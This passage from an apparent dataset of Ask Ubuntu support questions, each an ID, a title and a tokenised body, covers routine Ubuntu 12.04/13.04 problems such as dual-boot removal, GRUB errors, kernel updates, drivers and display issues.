ttl=53 time=119 ms 64 bytes from sin04s02-in-f16.1e100.net ( 173.194.38.176 ) : icmp_req=11 ttl=53 time=127 ms ^c -- - www.google.com ping statistics -- - 11 packets transmitted , 11 received , 0 % packet loss , time 10009ms rtt min/avg/max/mdev = 119.351/128.304/133.168/3.983 ms i am positive that i have no proxy and ipv6 is disabled . please help me with the problem .
288050	ubuntu server 12.04 hardware support	what is the hardware support like for ubuntu on servers ? can i install ubuntu 12.04 on any server and expect everything to work ? in particular , i 'm looking at supermicro servers ( model : sm 6027r-72rft+ ) and a huawei server ( mode : tecal rh 2285 v2 ) i 'm aware of the certified hardware list on ubuntu site , however it is restricted to hp/dell/lenovo brands , and is a very limited list . should i follow that list when choosing a ubuntu server ( ver : 12.04 ) or do i have a more free choice ? thanks
288053	how do i uninstall ubuntu from a dual-boot with windows 8 ?	i 'm definitely coming back to ubuntu in the fall for one of my classes but for now i would like to uninstall it . the only problem is , i 've heard that people who uninstall it improperly are unable to boot back into windows 8 and i really ca n't have that . currently , my system has ubuntu 13.04 , windows 7 and 8 [ all 64-bit ] . i originally installed ubuntu by making a new partition on my disk drive and booting from my flash drive which had the ubuntu 12.10 iso burned on to it . i then installed ubuntu 12.10 on to that partition . what 's the safest way to uninstall ubuntu with my setup ? please and thanks !
288054	upgrading wubi installation	as wubi is no longer supported i can obviously no longer use it to install the latest version of ubuntu , so here 's my question . is it possible to install ubuntu 12.04 using wubi and then update it to 13.04 in the wubi installation ? and if i can but it is risky to do so why is it risky and how can i protect my data .
288056	how can i uninstall ubuntu 12.04/13.04 ?	is it possible to uninstall ubuntu 12.04/13.04 and if so how ? i am currently dual booting it with windows 7 ( and it was n't installed via wubi and i do n't have a system repair disk . thanks
288058	where do i find a linux 3.9 kernel ?	i have ubuntu 13.04 desktop installed and i 've been reading about kernel 3.9s release yesterday . my issue is that i have no sound output with hdmi , something the new kernel apparently fixes . in reading , i 've also come across kernels built for specific processors ( i have an i5 on this laptop ) . i guess my question is there a place to get this 3.9 kernel for my i5 processor for install in ubuntu ?
288060	is there any way to downgrade or revert an update to the kernel ?	today i installed the linux 3.9 kernel update ( because i heard it would fix sound through hdmi which i no longer have since installing 13.04 ) . after restarted my computer and logging in my screen has only a desktop , and no dock or tool bar . i tried to reset unity and compiz using guides like this one but nothing happens , even after reboot . is there any way to downgrade or reset the update ? edit : running uname -a in terminal brings up 3.8.0 as my current kernel for some reason .
288061	how to fix acer aspire 4736z back light brightness control in ubuntu 13.04 ?	a simple way to fix acer aspire 4736z back light brightness control problem using hot keys ( fn + brightness +- )
288072	ubuntu 13.04 and compose key	i just installed ubuntu 13.04 and my alt gr key is broken on my laptop and i ca n't find the setting to change this to the left alt button . on my old ubuntu 12.10 had keyboard layouts setting there i had change it before
288073	invisible mouse shows in screenshots	i 'm running 12.10 server with xubuntu-desktop installed and notice that my mouse pointer dissapears . sometimes it 's just momentary , other times i ca n't get it back and must resort to reisub and shut down the computer . i notice that from time to time i must enter xfwm4 -- replace to fix xubuntu . perhaps because i 'm on older ( ok , old ) hardware ? are these bugs ? interestingly , the mouse is visible below ! however , when the xubuntu delayed screen shot app took that screenshot , the mouse was invisible . ( different from pressing screenshot button on keyboard . ) however , here you can see the disappearing mouse : which is very odd ! i double checked that the mouse was invisible . yet it shows in the screen shot . why ?
288078	ubuntu 13.04 installer hangs on `` configuring bcmwl-kernel-source ''	i 've let the installer run for about 4 hours , but the installation of ubuntu 13.04 32 bits it 's still stuck in this message : configuring bcmwl-kernel-source now , i 'm stuck with my phone until this is solved . computer specs : acer aspire 3610 - 2gb ddr2 - intel celeron m processor 1.5ghz - intel 915gm x86/mmx/sse2
288080	how do i remote to my desktop ?	i am wondering how i remote into my ubuntu machine from a windows machine that is on a different network ?
288083	does pastes made on ubuntu pastebin service get deleted ?	i had used ubuntu 's pastebin service to give the output of terminal commands as follow-up for the following question i had asked : problem resolving many of the web pages however , now i am not able to access any of the pastes i had made . there are atleast 5 pastebin links if i am counting correctly . all the links complain as : the paste you are looking for does not currently exist . see the image for yourself : so , is there any condition that the pastes would be deleted : after x number of days , or if it does n't get atleast x number of views every y days , or something similar . is it possible to recover them in any manner ?
288085	`` error : no such partition , grub rescue > '' how do i fix this ?	i had a dual boot with windows 7 and ubuntu 12 , and i deleted the ubuntu partitions , along with grub 2 . now i get this error and ca n't boot to windows . i have a bootable usb with ubuntu . will simply installing ubuntu restore grub and fix the problem ? ( i know it can be done with the ubuntu live cd without installing it , but i want to know if installing it will fix the problem . )
288087	can i use pkexec in a python script or a .desktop file ?	from the following questions why is gksu no longer installed by default in 13.04 ? when to use pkexec vs. gksu/gksudo ? we see that gksu will no longer be supported in the long term , and it will not be installed by default from > = 13.04 . instead we should use pkexec which does its job fine for non-graphical applications but not for apllications on the gui : pkexec gedit when replacing gksu in a .desktop file exec=pkexec /usr/bin/gedit or when i run a python script to run a graphical application with root permissions i get the following error : > > > subprocess.popen ( [ 'pkexec ' , 'gedit ' ] ) ** ( gedit:3203 ) : warning ** : could not open x display how would i have to re-write my scripts or my .desktop files to support an authentication dialog and run an application as root if i should not have it depend on gksu ?
288091	when i create files using < touch > command , files are now all locked . what changed ?	i am a new user of linux and am using ubuntu 13.04 raring ringtail . i really like the malleability of this operating system despite the fact that the common opinion , according to general information online by experienced users is that it offers limited control as compared to other linux distributions and versions of ubuntu . anyway , my quesiton relates to why creating files for the home directory has suddenly resulted in producing only locked files which i can not unlock despite the fact that : i created them as a root user , i am the only user , originally , i created several files using the ' touch ' command and they were accessible in the home directory . now , i can not even set the permissions for these locked files . would be really interested to know what might have caused this as i do n't recall changing any settings , ( at least not on purpose ) . looking forward to your replies .
288097	shortcuts no longer work for move window to left/right of screen in 12.04	i used to be able to send windows to the left/right half of the screen with ctrl-windows-left and ctrl-windows-right in 12.04 . now the left/right shortcuts do not work , but ctrl-windows-up / down still work as they used to ( maximise , minimise ) edit : couple of ubuntu updates later and it appears to be working again without my having to change anything .
288104	headphone jack does n't work on my asus laptop	i have dual boot systems on my asus laptop . when i run windows 7 my headphone jack is working , but when i run ubuntu 13.04 and reboot it to windows 7 headphone stops produced any sound to my headphones . i am sorry if i posted my question on wrong site . but my problem is very frustrating and i would like to resolve it with you help ubuntuers . if you need any further information please let me know .
288105	upgrade from 12.10 to 13.04 failed , now neither software center nor software updater will open	the update to 13.04 was offered , i accepted but it failed . now neither software centre nor updater will open . sc opens for a second then closes ; updater tells me : failed to load the package list this is a serious problem . try again later . if this problem appears again , please report an error to the developers . e : the package defoma needs to be reinstalled , but i ca n't find an archive for it . this is n't the first time i have had problems with software sources on 12.10 . both my desktop and laptop stopped getting updates and i resolved the issue by following solutions online involving cleaning and updating the package lists . i have followed various solutions this time but without success . i am currently downloading the iso for 13.04 . can i update with this or can it only be used for a clean install ? i would rather upgrade and keep my apps . help !
288106	kernel update on live usb harddrive 12.04lts	i need to create a portable working envrionment with ubuntu 12.04 , so i install a live disk onto a 20gb fat32 partition on my usb harddrive . i also created a ext4 partition on my usb disk labeling casper-rw ( the capser-rw on fat32 is deleted ) . the problem is there when i try to update my system by using update-manager , after a kernel upgrade , i can not boot into the system . do someone know how to upgrade the kernel ? other software is updated correctly .
288110	thunderbird crashes at start up	upgraded to 13.04 from 12.04 , but thunderbird crashes immediately on start , also tweak tool crashes when trying to access the font menu from terminal error message is : fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 14 : reading configurations from ~/.fonts.conf is deprecated . info : gsettings missing key org.gnome.nautilus.desktop ( key computer-icon-visible ) any help greatly appreciated cheers
288111	how to get google drive ( docs ) search to work in unity dash ?	how to get google drive ( docs ) search to work in unity dash ? i 've added my google account in the online accounts system settings panel . i 'm using ubuntu 13.04 with the following packages installed : ii unity-lens-applications ii unity-lens-files un unity-lens-friends un unity-lens-gdocs un unity-lens-music un unity-lens-photos un unity-lens-shopping un unity-lens-video un unity-scope-calculator un unity-scope-colourlovers un unity-scope-deviantart un unity-scope-gallica un unity-scope-gdocs ii unity-scope-gdrive un unity-scope-github un unity-scope-googlenews un unity-scope-imdb un unity-scope-launchpad un unity-scope-manpages un unity-scope-openclipart un unity-scope-openweathermap un unity-scope-soundcloud un unity-scope-virtualbox un unity-scope-yahoostock un unity-scope-yelp
288114	how to simulate keyboard input ?	this is the biggest thing keeping me from enjoying ubuntu/linux . ideally i 'd like to just be able to run my autohotkey script on ubuntu , but i did n't have much luck getting that working with wine . here 's what i 'm doing in ahk ( using extra modifiers also works , shift+alt+l is shift+right ) . ! l : : send , { right } + ! l : : send , + { right } ^ ! l : : send , ^ { right } ^+ ! l : : send , ^+ { right } i tried autokey , but it was n't consuming input , remapping alt + i to right arrow key worked , but it still executed alt + i , which sometimes selects an item from the application menu . the closest i got was xbindkeys for setting up hotkeys , this seems to work great . and xvkbd for simulating input ; this part is really buggy ; it does n't work in all programs , and causes me to lose focus a lot , among other issues . for anyone wondering what i 'm trying to do : i use i j k l as arrow keys while alt is down .
288121	how does my encrypted /home work , and how can i get it to work via cl on another linux distro ?	i 'm using an encrypted /home , but i have no idea how it works . i 'm trying to install arch linux and use commandline tools like ecryptfs , but i ca n't figure out how to mount my ubuntu encrypted /home . someone responded to my question on the arch forums and said that i needed my passphrase and salt , but i do n't know what either of those is , or where to find them .
288131	is it possible to add players to xfce panel ( volume ) indicator applet ?	a list of players is displayed when left clicking the volume indicator applet of xfce panel . but others are installed that i want to see there . can i add them ?
288133	how to change the default shutting down option	when i press the shutdown button on the pc , the power button on the laptop or click on the shutdown option on the system menu , the following options appear : how can i tell the system to change the default option . for example , if i wanted to have shutdown as the default option to simply press enter afterwards .
288135	how can i fix my kde theme after upgrading to kubuntu 13.04 ?	a while back , i installed kubuntu 12.10 and switched to the forman theme . today , i completed my upgrade to raring ( 13.04 ) and rebooted . now all of the graphical controls appear messed up : i 've just finished a complete run of : sudo apt-get update sudo apt-get dist-upgrade ... so i 'm pretty sure everything is up to date . how do i go about fixing this ? edit : the problem appears to be with the `` air '' desktop theme . switching to another desktop theme seems to resolve the problem - except i prefer the `` air '' theme .
288137	i 'm having dpkg errors	when i try to install something i get this output and i do n't know why . dpkg : error processing language-pack-kde-en ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : docbook-xml kdoctools kdelibs5-plugins kde-runtime kubuntu-debug-installer k3b qapt-batch k3b-i18n language-pack-kde-en
288140	working network card not recognized by ubuntu	i 've got ubuntu 12.10 ( quantal ) , linix version 3.9.0-999 generic . the box is hp dual boot with win 7 . i 've got a gigabit home lan and the box is fine with that in win 7 . ethernet adapter mac 78 e3 b5 ae b9 01 . however on the ubuntu side lspci gives me `` ethernet controller : atheros communications inc. ar8161 gigabit ethernet ( rev 8 ) '' . however ifconfig give me the loopback and eth0 mac address 44 6d 57 f8 67 0a and zip else . on the ubuntu side i 'm on the home lan wireless but ubuntu wo n't find and use the gigabit card that win 7 uses happily and lspci tells me is physically there . can anyone help ? i need to get ubuntu to find and use a perfectly functional gigabit network `` card '' .
288143	will windows 8 work after i install ubuntu 12.04 ?	i had searched and found many grub related problem after installing windows 8 over ubuntu or ubuntu over windows 8.so i fear to install ubuntu 12.04 . so what is the measures i need to take while installing ubuntu so that after restart both windows 8 & ubuntu will show up in boot menu and even after updating ubuntu . thanks .
288144	three monitors connected to amd 7970 , only hdmi works	just made a clean install of ubuntu 13.04 64-bit on my desktop machine with an amd 7970 graphics card installed . i use a 24 '' samsung screen that is connected via dvi as my primary monitor , a 19 '' fujitsu siemens screen as my secondary monitor connected via dvi - > vga , and last i 've got my 32 '' television connected via hdmi . i 've installed the latest amd catalyst 13.4 drivers for the gpu , but no matter how i configure my monitor setup in amdccc , it will only let me use the television that is connected via hdmi ? if i disconnect the television it will let me arrange my desktop as i want it , with my 24 '' samsung screen as my primary screen to the right , and with the 19 '' fujitsu monitor to left . but as soon i connect the television , it will only show the picture on that screen . i just need the workspace on my primary and secondary screen on my ubuntu partition , as i only use the telly for gaming on windows . are there any way that i can have all three monitors connected at the same time , but only use my primary and secondary screen ? i hope you guys understand my problems , sorry for my bad english : )
288149	what is the best notebook to run ubuntu ?	if i need a new notebook today and i go shopping , which notebook should i buy ? i mean : a notebook that supports ubuntu 13.04 without any issue . it has n't to be the most powerful notebook . it must be ubuntu 13.04 friendly .
288161	ubuntu 13.04 . how configure surround sound ?	my xonar dx 7.1 sound card thinks that it has only 2 channels . in 12.10 i modified /etc/pulse/daemon.conf file . http : //www.webupd8.org/2009/06/enable-surround-sound-in-ubuntu-linux.html i changed default-sample-channels = 8 but ca n't see no changes in sound settings . does anybody had the same problem ?
288163	ca n't install ubuntu , grub stage1.5read error ... new to ubuntu	ok so i have been struggling with this for the whole day now and i really need help . im new to ubuntu but i cant even get off the floor with it this is an install problem the os works fine from the cd but doesnt transfer to the drive . these are the details : i tried installing ubuntu 12.4 , did n't work had read errors from the drives i tried it on . i tried using an older version because i have old tech in this comp . that didnt work either same issue . finally got somewhere because of that though . the older version used a different resolution and i was able to see the word `` rub '' infront of the read error . this lead to finding out some common error 's with reading disks called grub errors . but all the internet posts spoke of numbers affixed to these i didnt have any . so my brother hinted at a bit of software a thing called 'ultimate boot cd ' to try and fix these issues . the software when booting from cd did n't really work the way intended but lead me to a number : grub loading stage1.5read error all of the other online articles are useless as they start talking about things i dont understand ( being new to linux ) and relatively new to coding in general .
288165	how to set keyboard shortcut for `` switch user '' in xubuntu ?	i am trying to create a keyboard shortcut in xubuntu ( 13.04 ) , but i have no idea what to put for the command . what is the command for invoking switch user ?
288166	how to find the directory of a usb port	i am trying to find the name of the second usb port in my computer in the director /dev/ since i am trying to find where my avr micro-controller programmer location to execute this command : avrdude -p t85 -p directorywhereprogrammeris -c avrispmkii -e -u flash : w : src.hex . any suggestions ? thanks !
288175	what are the default file permissions for the ubuntu one folder ?	i was playing around with the 'chown ' command . in my home folder /home/frank i ran sudo chown -r root 'ubuntu one ' . how can i restore the default file permissions of that folder ? i want to be sure that everything synchronises with my ubuntu one account . so i ran : sudo chown -r frank 'ubuntu one ' . is that ok ? inside my ubunt one folder there 's another folder 'shared with me ' that links to another folder . if i run ls -l /home/frank/'ubuntu one'/'shared with me' i get this result : lrwxrwxrwx 1 frank frank 41 mrt 8 04:11 shared with me - > /home/frank/.local/share/ubuntuone/shares are those file permissions ok ?
288176	tor and ubuntu 13.04	have been using tor on ubuntu 12.04 for months with zero problems . today i switched to ubuntu 13.04 and now ca n't get tor to work . did a clean new installation of ubuntu , downloaded the current tor and it wo n't run . is this a known issue ? fixed ! how do i run executable bash scripts in nautilus ? thx guys .
288177	why am i not receiving any updates ?	i recently upgraded from 12:10 to 13:04 on release day ... and i have n't seen any updates ... surely there have been updates ? or has there ? ? i just ca n't believe that there have been no updates for an ubuntu release for four days ? is this some kind of record or is there a problem with my computer ? ? sources.list
288186	if i have ubuntu installed along side windows , does the firewall on windows work along with the antivirus system ?	i have ubuntu installed on my windows 7 computer . i was curious to know if the firewall on that one is activated ( i have to turn it on each time i 'm on the computer ) along with the antivirus system , if not , should i download avg and firestarter ?
288198	lower than max resolutions not scaling to full screen	when applications or i manually select lower resolutions it will only show in the top left corner of my screen with the correct amount of pixels . there are streaking colors coming off to the right . this happened to me on some older versions and was correct through the 11 and 12 series . sudo lshw -c video *-display:0 description : vga compatible controller product : mobile 915gm/gms/910gml express graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 03 width : 32 bits clock : 33mhz capabilities : pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:16 memory : dff00000-dff7ffff ioport : ec38 ( size=8 ) memory : c0000000-cfffffff memory : dfec0000-dfefffff *-display:1 unclaimed description : display controller product : mobile 915gm/gms/910gml express graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 03 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : dff80000-dfffffff i 'm not sure if its supposed to be showing that second unclaimed monitor or what but it seems like the correct driver is enabled . i tried to look for the xconf in the normal place but nothing was there so i guess that is n't around anymore . as a side note scaling is enabled in the bios and works properly for the bios screen alternate install cd . does anyone have any tips on how to fix this ?
288201	`` can not determine current directory '' while building haskell in 13.04	i 'm trying to install the haskell platform on raring . since there 's no apt package , i 've downloaded the ghc 7.4.2 binary x86_64 distribution ( which is a prerequisite ) , and i am trying to run ./configure . it 's failing with the following message : checking for path to top of build tree ... utils/ghc-pwd/dist/build/tmp/ghc-pwd : error while loading shared libraries : libgmp.so.3 : can not open shared object file : no such file or directory configure : error : can not determine current directory how can i fix this ?
288209	how to get jupiter in ubuntu gnome	so i switched from ubuntu to gnomebuntu today , and proceeded to try and install all the apps that i had found invaluable with ubuntu . i have run into a road block with jupiter , and was wondering if anyone knew any tricks for installing it in 13.04 . or had a guide that was up to date .
288210	can ubuntu access files within an old operating system on an external hard drive ?	my laptop is dying ( motherboard issue ) and i 'm due to receive my new laptop tomorrow . i 'm considering converting the current hard drive ( sata , 350gb ) into an external hard drive using a sata-to-usb conversion kit . the drive currently has 3 main partitions ( plus a swap partition ) : windows 7 , ubuntu , windows 7 recovery . my question is , if i were to do this , would ubuntu ( 13.04 is what i 'm planning to install alongside windows 8 ) be able to access the files on this drive even though the drive has operating systems installed ? would this work for both windows 7 and ubuntu 12.04lts ? i understand how to mount the drive , etc . my question is not one of how to use/mount a hard-drive ; but a question of how would ubuntu treat a file system that is organized according to an operating system that is not the version that the drive is being mounted to .
288212	missing `dev/audio`	i recently installed ubuntu 12.04 , and while trying to use a program ( dsd if anyone is curious ) it became apparent that dev/audio does not exist . i do have a sound device installed as seen by lscpi -v : 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) subsystem : dell device 01fc flags : bus master , slow devsel , latency 64 , irq 16 memory at febfc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel why would capabilities be access is denied .
288221	making a live cd	i am running windows 7 professional . i have downloaded version 12.04 iso . can not find windows iso burner as described in your web page . downloaded the opensorce cd/dvd burner and made disk . disk does not work . am i missing something ? when using the windows 7 it opens the iso as a compressed file and asks to unpack it . according to the web page instructions there is no mention of having to unpack .
288225	ubuntu 13.04 three-finger window moving not working anymore	i juste upgraded to ubuntu 13.04 on my samsung new series 9 ( np900x4c-a01fr ) . before , in 12.10 , i could move/minimize/maximize the windows , using 3 fingers . these 3 functions does n't work anymore . how to recover these ? and here is what works : 2 fingers : scrolling 3 fingers : 2 tap to display the windows switcher 4 fingers : 1 tap to launch the dash , swipe gesture to show/hide the launcher thanks .
288229	i just upgraded to 13.04 and samba is n't working . it is installed but will not open . any help ?	so i just upgraded to 13.04 . i had to do a fresh install because i was having problems updating from 12.04 , so i lost all of my previous settings and programs . now that 13.04 is up and running , i immediately installed samba as it is how i stream my media to my wdtv live . the software center says that samba has successfully installed and it appears in my dock , but when i click it it does not open . when i restart my computer samba disappears from my dock and it can not be found on my computer ( by searching in unity ) . i then have to go to the software center , uninstall samba and reinstall it in order to get it to appear in my dock again . of course , the problem persists . any idea what the problem might be ?
288232	alsa mixer mutes headphones every time i plug them	ever since i updated my laptop from 12.10 to 13.04 i 've been experiencing a strange behaviour with my ubuntu installation . every time i plug in my headphones the volume becomes mute . i can only unmute them through alsamixer . it is annoying to do this every time i want to listen my music , could somebody point me to a fix or workaround ? thanks in advance . laptop : hp pavilion dv6 6185la
288234	ca n't log in to ubuntu-one	i get : '' openid failed openid discovery error : http response status from identity url host is not 200 . got status 503 ''
288235	launcher and panel missing [ ubuntu 13.04 ]	when i booted my laptop to ubuntu 13.04 today the panel and launcher were both missing from the screen and i had no idea how to get them back . using a ubuntu 13.04 install medium i formatted / and installed the system again leaving my /home intact . when i logged in to my user account the problem persisted . the unity-greeter is displayed perfectly fine and the guest account has no problems either . i was eventually able to get the launcher and panel back by deleting .config/ .gconf/ .local/ and .cache/ but when i restarted my laptop the problem was back . do you have any suggestions for me ? the last thing i tried earlier was unity -- reset but i got an error message telling me that it 's deprecated .
288236	virtual machine	i recently bought a sony vaio svt13115fls , first try to partition the hard drive and install ubuntu from a live usb , it not works because the laptop never recognized the boot . then i tried with wubi , it works in a first moment , but once i open windows , wubi never worked again . now ( the ultime option to run ubuntu ) i install the virtual machine ( virtualbox oracle ) and install ubuntu 12.04 all works fine until the final step when is necessary restart the system in order to complete the install , when i did click restart the virtual machine is closed , and the install of ubuntu never is completed .
288250	reducing pdf size to optimize its performance on kindle ?	is there any tool on ubuntu that i can use to reduce the physical size of the pdf in terms of it 's dimensions so that the file can handle better on a kindle ? gui method please . note : pdf has images and text .
288252	is there a way to use a laptop with a wireless card to bridge connectivity to a computer that only supports ethernet ?	how would i setup my laptop ( which obviously has a wireless card ) to bridge the internet provided by the wireless to a device ( raspberry pi ) that does n't have wireless access , through my laptop 's ethernet port ?
288253	how can i get wireless to stop disconnecting on my asus x201e ?	it will work for a while and then randomly disconnect . its quite annoying , especially when streaming any sort of media . i have tried it on multiple networks and it happens regardless of network . at home , i have 3 bars on the wi-fi indicator . i am aware you probably need more information . please tell me what you need so and how to find it . i do n't have any programming skills , and bought the laptop on the hope that `` linux for humans '' was real . now i find myself going back to my old mac just to avoid the problem . 02:00.0 network controller [ 0280 ] : atheros communications inc. ar9462 wireless network adapter [ 168c:0034 ]
288259	`` e : unable to locate package touchpad-indicator '' even after adding repository and enabling sources	i 'm trying to install the touchpad-indicator discussed here : http : //www.webupd8.org/2011/02/touchpad-indicator-now-automatically.html but i keep getting this error , even after using software center to enable those software sources . any help ? i 'd like to have this program . thanks .
288262	graphics performance is worse in ubuntu 12.04 lts than windows xp : using- intel速 945g x86/mmx/sse2	graphics performance is worse in ubuntu 12.04 lts than windows xp : using- intel速 945g x86/mmx/sse2 in windows xp professional , the graphics process much more effectively . i can watch hd videos without losing frames and can play the exact same games , again , without nearly as much of what seems like very poor frames per second . gets pretty choppy , irregardless of ping , in game . overall , xp professional is way smoother in seemingly every way , and not sure why . also , it says `` standard '' regarding my experience in system settings , under details in ubuntu 12.04 lts .
288265	display brightness problem with ubuntu 13.04	i have a dell inspiron 5520 with intel core i7 and amd graphics card . it used to work fine with ubuntu 12.04 and ubuntu 12.10 . now i tried to install ubuntu 13.04 but i ca n't change display brightness : the fn keys do n't change it , the indicator shows it always almost full , but wo n't change , wo n't increase or decrease . the same problem is there for both x86 and amd64 versions of ubuntu . what 's the problem ?
288270	disk usage analyzer replacing nautilus	so this is a fun problem . after upgrading to raring ringtail , the open file command for nautilus on everything except the file browser in unity itself ( opening downloads from browsers , clicking on removable media in unity ) opens the disk usage analyzer instead of nautilus . is there a config file somewhere that chooses these defaults ? i ca n't seem to find it .
288275	why is linux-image-extra missing from 3.8.9 onwards ?	i 've been using kernels from ubuntu kernel team ppa for some time now . i have setup a script that wget 's all the four files required for my setup : all the amd64+all headers , total of 4 files . kernel 3.8.8 for example . in 3.8.9 and 3.9 , there is no longer linux-image-extra package . why was it dropped ? is the functionality it provided now included in the main package ? who is affected ?
288280	how to install the new version of the rtl8187 driver on ubuntu 13.04 ?	well , ubuntu has made me feel very welcome in the linux world , opening its arms with serious problems . i guess i would n't say i am new , but i have n't used ubuntu for almost 5 years now . i have been having a large issue where my alfa awus036h wireless adapter is experiencing a very slow connection . it takes me about 5-10 minutes to download 5mb , and i have a 100mbps download speed through my provider . this worked great on windows , but now that i have switched to ubuntu , i am having so many problems . i read here that if i re-install the new version of the realtek rtl8187 driver , it would fix my speed issue . i downloaded the most recent version of the rtl8187l driver , followed the steps provided , and ended up with this stacktrace : make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.o /home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.c:153:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl8187_usb_probe’ /home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.c:155:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl8187_usb_disconnect’ /home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.c:168:12 : error : ‘rtl8187_usb_probe’ undeclared here ( not in a function ) /home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.c:169:16 : error : ‘rtl8187_usb_disconnect’ undeclared here ( not in a function ) /home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.c : in function ‘rtl8180_tx’ : /home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.c:1382:12 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.c : in function ‘rtl8187_usb_initendpoints’ : /home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.c:1588:14 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.c : at top level : /home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.c:3762:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl8187_usb_probe’ /home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.c:3862:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl8187_usb_disconnect’ make [ 2 ] : *** [ /home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187/r8187_core.o ] error 1 make [ 1 ] : *** [ _module_/home/lehmanlb/desktop/rtl8187l_linux_1041.0209.2012/rtl8187 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' make : *** [ all ] error 2 here is my iwconfig : lehmanlb @ lehmanlb-p6710f : ~/desktop/rtl8187l_linux_1041.0209.2012 $ iwconfigwlan1 ieee 802.11bg essid : '' 6wfbc '' mode : managed frequency:2.462 ghz access point : 00:7f:28:64:42:80 bit rate=54 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-30 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:89 missed beacon:0 eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=27 dbm retry long limit:7 rts thr : off fragment thr : off power management : off if you need any more information let me know ! i am dying to get something working here ! thanks .
288281	dual boot - grub2 not detecting ubuntu server ( 10.4 , 64 bit ) after installing ubuntu desktop ( 12.04 )	requirement i have a computer which runs ubuntu 10.4.3 ( 64 bit server ) installed over lvm and /boot filesystem and i wanted it to dual boot to ubuntu 12.04 ( desktop , 32 bit ) . completed successfully : creating a free partition to installed desktop version- followed procedures/discussions in this question and freed up 200 gb out of 200gb hard disk . this was successful . installing ubuntu 12.04.1 desktop version ( 32 bit ) - successfully installed os iun to newly created free space as /dev/sda6 ( extended ) the problem : during install , desktop version failed to see ubuntu server 's presence and asked me if i want to use who system . i used manual install to over come install correctly . grub did not detect my ubuntu server install and set it up directly to boot to ubuntu 12.04 . what i tried to fix this : i used grub2 recovery procedures described in this question using ubuntu 12.04.2 64 bit server cd and could get only server install back . grub did not detect my desktop version in a different partition . i used the same procedures with desktop cd and then grub only detected and installed my desktop version , did not detect my server version . edit 1 downloaded rescatux cd and tried to 'update grub configuration ' and 'restore grub ' . update grub configuration failed when i chose the lvm and succeeded when i chose sda6 ( non-lvm ubuntu 12.04 ) and restore grub forced me to choose one partition and depending upon the partition i choose , i could boot only that version linux . question how to get this to boot as dual boot option ?
288284	isolation program or just good antivirus ?	a friend of mine just got her computer back from her sister . it 's running windows and was ate up with mal-ware and viruses . i think i 've pretty much sanitized it but some of those files are about to make a stop on my system running ub12.10 . i 'm being cautious and want to find a condom for the files . is there a program to quarantine questionable files ? or , do i just need to make sure i have an antivirus and anti mal-ware that work ? if so where can i get them for 12.10 ?
288286	junk display while installing 12.04 ( only with core i3 3220 cpu )	i am from acer india . i 'm getting a junk display while installing ubuntu 12.04 64/32-bit edition . we can do the installation by following the onscreen instructions , but after the installation once logged in , the system hangs with a junk display . it happens only with the ivy bridge core i3 3220 cpu ; we can install without issues with any 2nd generation cpu . the motherboard used is ecs h61h2-m2 ver 2.0 ( supports ivy bridge cpu ) .
288287	where to start in linux programming	i am a student and i would like to study all these terminal stuffs and all . you all will be experts in this subject . i would like to know where did you all begin and what must i do to be an expert in linux programming or the terminal .
288288	how to enable the dvd writer `passthrough` checkbox in virtualbox	i need to burn a dvd from windows 8 inside virtualbox . the drive is called host drive tsstcorp dvdwbd . i have many times in the past burned dvds with this device from ubuntu using dvd+r media . this is the first attempt with windows 8 inside virtualbox . how would i enable access to the passthrough checkbox ? as you can see , it is greyed out . selecting the machine , settings , storage , controller ide , host drive tsstcorp dvdwbd does not seem to enable the checkbox . enabling the dvd writer via devices , dvd , host drive tsstcorp dvdwbd also does not enable the checkbox at the machine , settings , storage dialog . it makes no difference whether the drive is loaded with a blank dvd+r or with a previously written one ( produced on real windows machine ) .
288292	installed ubuntu but ca n't change installed files	i installed ubuntu on windows 7 . also , i installed gromacs software . there is some problem with one of the files located in /usr/local/gromacs/share/top/ folder . i want to make some changes to and save it , but it always says `` permission denied '' . i have tried chmod but it says `` operation not permitted '' . i really do n't know i can change that file . i installed the os , so i should have the privileges to change the file . please help . thanks ...
